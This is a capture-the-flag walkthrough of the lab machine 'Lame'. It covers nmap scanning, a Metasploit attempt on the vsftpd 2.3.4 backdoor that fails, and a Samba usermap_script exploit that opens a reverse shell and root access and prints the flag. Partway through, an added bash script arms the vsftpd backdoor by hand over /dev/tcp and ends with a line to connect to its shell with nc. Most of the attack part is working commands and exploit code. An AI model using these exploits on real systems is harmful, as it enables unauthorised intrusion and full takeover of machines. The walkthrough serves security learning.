Lame

Scanning the target
root@goldeneagle:~# nmap -sT -sV -A -O 10.10.10.3
Starting Nmap 6.40 ( http://nmap.org ) at 2017-05-14 01:53 EDT
Nmap scan report for 10.10.10.3
Host is up (0.36s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), Crestron XPanel control system (90%), Netgear DG834G WAP or Western Digital WD TV media player (90%), Linux 2.4.18 (90%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N66U WAP (Linux 2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2017-05-13T12:34:38-04:00
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 316.29 ms 10.10.12.1
2 316.44 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.57 seconds
That gives a list of open ports, but here I'm only focusing on what I'm exploiting, so I'll start with FTP, the first open port. It's running vsftpd 2.3.4.
Searching for known vulnerabilities with searchsploit:
root@goldeneagle:/opt/exploit-database# ./searchsploit vsftpd
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
Exploit Title | Path
| (/opt/exploit-database/platforms/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption | linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | windows/dos/31819.pl
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
Now it's time to load Metasploit (msfconsole) and search for a matching module:
msf > search vsftp
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
OK, let's load the module and exploit the target:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Oops: the exploit completed but no session was created. The module arms the backdoor by sending a USER value containing ":)" and then connects to the shell the backdoor opens on 6200/tcp; if that port is filtered between my box and the target, the exploit fails exactly like this even though the trigger was delivered. I don't know what the issue is yet, so I'll save the command below to try again later and find another way in.
$ msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.10.3"
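Before moving on, here is an added example (my own script, not part of the original walkthrough) that arms the backdoor by hand and then checks whether its shell port is reachable, which separates "trigger never sent" from "port 6200 filtered". The target address, ports and timeouts are assumptions; the backdoor behaviour itself (a USER value containing ":)" makes vsftpd 2.3.4 open a shell on 6200/tcp) is the same one the Metasploit module relies on.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post. Manually arms the vsftpd 2.3.4
# backdoor and reports whether the bind shell it opens on 6200/tcp can be reached.
# Host, ports and timeouts are assumptions for illustration.

# FTP dialogue that arms the backdoor: vsftpd 2.3.4 checks the USER value for ":)"
# and, if present, forks a shell listening on TCP/6200. The password is irrelevant.
vsftpd_trigger_payload() {
    local user="${1:-x}"
    printf 'USER %s:)\r\nPASS pwned\r\n' "$user"
}

# Return 0 if host:port completes a TCP handshake within timeout seconds, else non-zero.
tcp_open() {
    local host="$1" port="$2" timeout="${3:-5}"
    timeout "$timeout" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Send the trigger, then probe the backdoor port. Prints one of:
#   ftp_unreachable | backdoor_unreachable | shell_open
vsftpd_backdoor_check() {
    local host="$1" ftp_port="${2:-21}" bd_port="${3:-6200}"
    if ! tcp_open "$host" "$ftp_port" 5; then
        echo ftp_unreachable
        return 1
    fi
    # Hold the control connection open a few seconds so vsftpd parses both lines
    # before we hang up; the backdoor listener survives the disconnect.
    { vsftpd_trigger_payload x; sleep 3; } \
        | timeout 10 bash -c "exec 3<>/dev/tcp/$host/$ftp_port; cat >&3" 2>/dev/null
    if tcp_open "$host" "$bd_port" 5; then
        echo shell_open
        return 0
    fi
    # Trigger went out but 6200 does not answer: most likely something filters it
    # between us and the target, which is also why the Metasploit module reports
    # "Exploit completed, but no session was created".
    echo backdoor_unreachable
    return 2
}

# Usage (attacker box):
#   vsftpd_backdoor_check 10.10.10.3 && nc 10.10.10.3 6200
```

If the result is backdoor_unreachable, no amount of re-running the Metasploit module will help; the trigger works but the shell port is not reachable from where you stand, so pivot to another service.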
Let me check the OS reported by the SMB scripts: Unix (Samba 3.0.20-Debian). Let's Google it and see if I'm lucky.
Samba "username map script" Command Execution (CVE-2007-2447): this module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. Samba passes the supplied username to that script through a shell, so shell metacharacters in the username run as the smbd user. There is an MSF module for that, so let's try it.
msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.13.186:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo o41hy8PKew3xCgmK;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\no41hy8PKew3xCgmK\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.13.186:4444 -> 10.10.10.3:44740) at 2017-05-14 02:48:25 -0400
id
uid=0(root) gid=0(root) # root shell spawned, no privilege escalation needed
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
pwd
/
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df # here is my proof
